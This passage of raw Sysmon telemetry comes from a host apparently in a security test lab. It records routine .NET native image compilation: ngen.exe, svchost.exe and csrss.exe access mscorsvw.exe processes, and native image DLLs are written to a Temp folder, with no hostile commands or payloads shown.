13:26:32.497{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4688-6000-7B04-000000009A01}3796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008637Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.465{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4688-6000-7A04-000000009A01}5104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008636Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.450{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4688-6000-7A04-000000009A01}5104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008635Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:32.450{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4688-6000-7A04-000000009A01}5104C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008634Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:32.372{08A6967A-4687-6000-7904-000000009A01}4216C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1078-0\System.IdentityModel.Services.dll2021-01-14 13:26:32.372 11241100x80000000000000008666Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:33.965{08A6967A-4689-6000-8204-000000009A01}808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\328-0\System.Management.Instrumentation.dll2021-01-14 13:26:33.965 10341000x80000000000000008665Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.762{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4689-6000-8204-000000009A01}808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008664Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.747{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4689-6000-8204-000000009A01}808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008663Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.747{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4689-6000-8204-000000009A01}808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008662Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.684{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4689-6000-8104-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008661Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.669{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4689-6000-8104-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008660Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.669{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4689-6000-8104-000000009A01}2940C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008659Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.340{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4689-6000-8004-000000009A01}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008658Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.325{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-4689-6000-8004-000000009A01}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008657Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.325{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4689-6000-8004-000000009A01}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008656Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:33.247{08A6967A-4689-6000-7F04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e68-0\System.IO.Log.dll2021-01-14 13:26:33.247 10341000x80000000000000008655Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.028{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4689-6000-7F04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008654Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.012{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4689-6000-7F04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008653Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:33.012{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4689-6000-7F04-000000009A01}3688C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008679Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.778{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468A-6000-8604-000000009A01}3772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008678Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.762{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-468A-6000-8604-000000009A01}3772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008677Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.762{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468A-6000-8604-000000009A01}3772C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008676Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.700{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-468A-6000-8504-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008675Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.684{08A6967A-4286-6000-0500-000000009A01}636652C:\Windows\system32\csrss.exe{08A6967A-468A-6000-8504-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008674Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:34.684{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-468A-6000-8504-000000009A01}3968C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008673Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:34.622{08A6967A-468A-6000-8404-000000009A01}2424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\978-0\System.Messaging.dll2021-01-14 13:26:34.622 10341000x80000000000000008672Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 